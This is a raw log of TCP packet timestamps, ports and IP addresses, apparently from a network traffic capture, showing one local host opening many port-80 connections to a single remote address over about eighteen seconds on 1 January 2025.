Jan 1, 2025 14:52:20.433379889 CET	49766	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:20.433525085 CET	49766	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:20.436588049 CET	80	49764	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:20.436638117 CET	49764	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:20.436644077 CET	80	49765	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:20.436697006 CET	49765	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:20.438292027 CET	80	49766	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:20.792599916 CET	49766	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:20.798368931 CET	80	49766	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:20.898731947 CET	80	49766	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:20.948796034 CET	49766	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:21.162894964 CET	80	49766	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:21.214319944 CET	49766	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:21.286190033 CET	49766	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:21.287132978 CET	49767	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:21.291444063 CET	80	49766	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:21.292051077 CET	80	49767	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:21.292119026 CET	49766	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:21.292160988 CET	49767	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:21.292273045 CET	49767	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:21.297147989 CET	80	49767	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:21.636364937 CET	49767	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:21.641371012 CET	80	49767	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:21.745121002 CET	80	49767	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:21.792526007 CET	49767	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:22.003360033 CET	80	49767	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:22.061844110 CET	49767	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:22.273689985 CET	49767	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:22.292331934 CET	49768	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:22.297231913 CET	80	49768	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:22.297311068 CET	49768	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:22.297456980 CET	49768	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:22.302298069 CET	80	49768	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:22.651901960 CET	49768	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:22.656924963 CET	80	49768	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:22.749231100 CET	80	49768	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:22.792421103 CET	49768	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:23.024743080 CET	80	49768	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:23.073676109 CET	49768	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:23.144802094 CET	49768	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:23.145457029 CET	49769	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:23.150018930 CET	80	49768	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:23.150361061 CET	80	49769	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:23.150408983 CET	49768	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:23.150434971 CET	49769	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:23.150538921 CET	49769	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:23.155342102 CET	80	49769	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:23.495640039 CET	49769	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:23.500581026 CET	80	49769	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:23.624933004 CET	80	49769	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:23.667416096 CET	49769	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:23.880774021 CET	80	49769	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:23.933049917 CET	49769	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:24.024074078 CET	49769	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:24.024636030 CET	49770	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:24.029124975 CET	80	49769	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:24.029548883 CET	80	49770	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:24.029601097 CET	49769	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:24.029630899 CET	49770	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:24.029736042 CET	49770	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:24.034517050 CET	80	49770	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:24.387021065 CET	49770	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:24.391957045 CET	80	49770	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:24.474194050 CET	80	49770	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:24.526820898 CET	49770	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:24.744895935 CET	80	49770	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:24.792649031 CET	49770	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:24.865411997 CET	49770	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:24.865595102 CET	49771	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:24.870464087 CET	80	49771	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:24.870507956 CET	80	49770	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:24.870599031 CET	49770	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:24.870827913 CET	49771	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:24.870827913 CET	49771	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:24.875694990 CET	80	49771	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:25.230000019 CET	49771	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:25.234934092 CET	80	49771	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:25.324537992 CET	49771	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:25.324948072 CET	49772	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:25.328108072 CET	80	49771	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:25.328175068 CET	49771	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:25.329595089 CET	80	49771	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:25.329648018 CET	49771	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:25.329829931 CET	80	49772	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:25.329893112 CET	49772	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:25.329962015 CET	49772	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:25.334768057 CET	80	49772	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:25.442640066 CET	49773	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:25.447936058 CET	80	49773	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:25.448134899 CET	49773	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:25.448699951 CET	49773	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:25.453715086 CET	80	49773	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:25.683173895 CET	49772	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:25.688102961 CET	80	49772	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:25.688137054 CET	80	49772	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:25.792789936 CET	49773	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:25.797724962 CET	80	49773	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:25.802619934 CET	80	49772	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:25.855143070 CET	49772	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:25.921072006 CET	80	49773	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:25.964446068 CET	49773	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:26.072232962 CET	80	49772	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:26.120757103 CET	49772	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:26.185583115 CET	80	49773	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:26.229965925 CET	49773	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:26.301347017 CET	49772	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:26.301558018 CET	49773	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:26.302023888 CET	49774	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:26.306477070 CET	80	49772	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:26.306540966 CET	49772	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:26.306730986 CET	80	49773	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:26.306773901 CET	49773	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:26.306859016 CET	80	49774	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:26.306921959 CET	49774	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:26.307028055 CET	49774	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:26.311898947 CET	80	49774	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:26.651985884 CET	49774	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:26.656953096 CET	80	49774	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:26.779622078 CET	80	49774	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:26.823702097 CET	49774	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:27.036976099 CET	80	49774	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:27.089418888 CET	49774	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:27.160980940 CET	49775	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:27.165904999 CET	80	49775	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:27.166001081 CET	49775	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:27.166116953 CET	49775	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:27.170952082 CET	80	49775	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:27.511488914 CET	49775	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:27.516402006 CET	80	49775	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:27.641555071 CET	80	49775	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:27.683191061 CET	49775	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:27.899215937 CET	80	49775	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:27.948718071 CET	49775	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:27.991584063 CET	80	49775	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:28.042644978 CET	49775	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:28.109411955 CET	49774	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:28.113188982 CET	49775	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:28.113818884 CET	49776	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:28.120385885 CET	80	49776	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:28.120445967 CET	80	49775	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:28.120460033 CET	49776	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:28.120491982 CET	49775	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:28.120573044 CET	49776	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:28.125459909 CET	80	49776	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:28.480319023 CET	49776	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:28.485336065 CET	80	49776	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:28.564743996 CET	80	49776	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:28.620687962 CET	49776	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:28.839664936 CET	80	49776	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:28.886315107 CET	49776	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:28.960680008 CET	49776	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:28.960982084 CET	49777	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:28.966296911 CET	80	49776	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:28.966335058 CET	80	49777	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:28.966356039 CET	49776	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:28.966402054 CET	49777	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:28.966810942 CET	49777	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:28.972110033 CET	80	49777	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:29.323834896 CET	49777	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:29.328977108 CET	80	49777	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:29.449487925 CET	80	49777	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:29.495699883 CET	49777	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:29.710602045 CET	80	49777	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:29.761316061 CET	49777	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:29.831474066 CET	49777	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:29.832180977 CET	49778	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:29.836520910 CET	80	49777	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:29.836586952 CET	49777	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:29.837073088 CET	80	49778	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:29.837255001 CET	49778	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:29.837430000 CET	49778	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:29.842313051 CET	80	49778	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:30.183309078 CET	49778	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:30.188270092 CET	80	49778	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:30.291994095 CET	80	49778	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:30.339353085 CET	49778	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:30.564135075 CET	80	49778	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:30.605000019 CET	49778	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:30.676055908 CET	49778	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:30.676359892 CET	49779	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:30.681174994 CET	80	49778	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:30.681212902 CET	80	49779	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:30.681266069 CET	49778	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:30.681310892 CET	49779	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:30.691910028 CET	49779	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:30.696810007 CET	80	49779	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:31.042700052 CET	49779	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:31.047735929 CET	80	49779	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:31.083210945 CET	49780	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:31.083378077 CET	49779	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:31.088110924 CET	80	49780	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:31.088232040 CET	49780	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:31.088476896 CET	80	49779	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:31.088521957 CET	49779	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:31.102561951 CET	49780	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:31.107429981 CET	80	49780	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:31.254189968 CET	49781	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:31.259175062 CET	80	49781	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:31.259265900 CET	49781	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:31.259345055 CET	49781	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:31.264166117 CET	80	49781	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:31.448810101 CET	49780	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:31.453802109 CET	80	49780	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:31.453882933 CET	80	49780	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:31.560277939 CET	80	49780	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:31.604984999 CET	49780	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:31.605093956 CET	49781	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:31.609940052 CET	80	49781	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:31.722676039 CET	80	49781	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:31.776992083 CET	49781	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:31.836441994 CET	80	49780	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:31.886360884 CET	49780	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:31.985232115 CET	80	49781	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:32.026859999 CET	49781	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:32.097893953 CET	49781	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:32.097893000 CET	49780	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:32.098545074 CET	49782	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:32.102931976 CET	80	49781	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:32.103005886 CET	49781	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:32.103199959 CET	80	49780	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:32.103249073 CET	49780	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:32.103415966 CET	80	49782	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:32.103485107 CET	49782	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:32.103571892 CET	49782	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:32.108417034 CET	80	49782	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:32.451190948 CET	49782	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:32.456352949 CET	80	49782	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:32.578933001 CET	80	49782	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:32.620709896 CET	49782	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:32.843348980 CET	80	49782	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:32.902060032 CET	49782	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:32.958365917 CET	49783	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:32.963363886 CET	80	49783	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:32.963529110 CET	49783	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:32.963529110 CET	49783	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:32.968374968 CET	80	49783	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:33.308507919 CET	49783	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:33.313523054 CET	80	49783	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:33.426918983 CET	80	49783	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:33.471055031 CET	49783	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:33.682763100 CET	80	49783	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:33.729998112 CET	49783	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:33.773332119 CET	80	49783	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:33.823736906 CET	49783	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:33.923078060 CET	49783	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:33.924181938 CET	49784	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:33.928126097 CET	80	49783	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:33.928169012 CET	49783	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:33.929039955 CET	80	49784	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:33.929096937 CET	49784	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:33.929259062 CET	49784	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:33.934091091 CET	80	49784	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:34.276952028 CET	49784	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:34.281907082 CET	80	49784	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:34.376506090 CET	80	49784	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:34.433131933 CET	49784	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:34.644387007 CET	80	49784	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:34.698836088 CET	49784	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:34.770344019 CET	49784	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:34.770565987 CET	49785	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:34.775389910 CET	80	49784	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:34.775470018 CET	80	49785	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:34.775533915 CET	49784	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:34.775567055 CET	49785	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:34.775681019 CET	49785	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:34.782665014 CET	80	49785	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:35.120800018 CET	49785	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:35.125727892 CET	80	49785	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:35.240478992 CET	80	49785	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:35.292624950 CET	49785	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:35.421550989 CET	80	49785	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:35.464389086 CET	49785	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:35.536771059 CET	49785	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:35.537442923 CET	49786	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:35.542228937 CET	80	49785	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:35.542269945 CET	80	49786	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:35.542308092 CET	49785	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:35.542352915 CET	49786	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:35.542504072 CET	49786	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:35.547296047 CET	80	49786	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:35.902036905 CET	49786	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:35.907026052 CET	80	49786	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:35.991522074 CET	80	49786	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:36.042654037 CET	49786	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:36.259244919 CET	80	49786	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:36.308151007 CET	49786	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:36.376421928 CET	49782	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:36.381344080 CET	49786	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:36.381916046 CET	49787	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:36.386394024 CET	80	49786	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:36.386456966 CET	49786	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:36.386737108 CET	80	49787	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:36.386796951 CET	49787	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:36.387100935 CET	49787	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:36.391963959 CET	80	49787	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:36.745752096 CET	49787	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:36.750694036 CET	80	49787	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:36.831913948 CET	80	49787	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:36.840270996 CET	49787	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:36.840586901 CET	49788	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:36.845350981 CET	80	49787	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:36.845421076 CET	49787	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:36.845475912 CET	80	49788	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:36.845544100 CET	49788	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:36.845633030 CET	49788	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:36.850488901 CET	80	49788	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:36.957321882 CET	49789	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:36.962307930 CET	80	49789	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:36.962385893 CET	49789	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:36.962460041 CET	49789	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:36.967297077 CET	80	49789	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:37.198889971 CET	49788	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:37.203844070 CET	80	49788	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:37.203924894 CET	80	49788	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:37.308198929 CET	49789	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:37.313129902 CET	80	49789	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:37.313612938 CET	80	49788	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:37.355025053 CET	49788	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:37.438461065 CET	80	49789	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:37.480022907 CET	49789	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:37.651196003 CET	80	49788	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:37.688648939 CET	80	49789	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:37.698774099 CET	49788	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:37.730036974 CET	49789	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:37.801117897 CET	49788	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:37.801158905 CET	49789	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:37.801970005 CET	49790	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:37.806241989 CET	80	49788	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:37.806312084 CET	49788	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:37.806488991 CET	80	49789	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:37.806534052 CET	49789	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:37.806843042 CET	80	49790	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:37.806906939 CET	49790	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:37.806979895 CET	49790	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:37.811750889 CET	80	49790	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:38.152055979 CET	49790	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:38.156966925 CET	80	49790	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:38.291757107 CET	80	49790	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:38.339504004 CET	49790	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:38.547609091 CET	80	49790	104.21.38.84	192.168.2.4
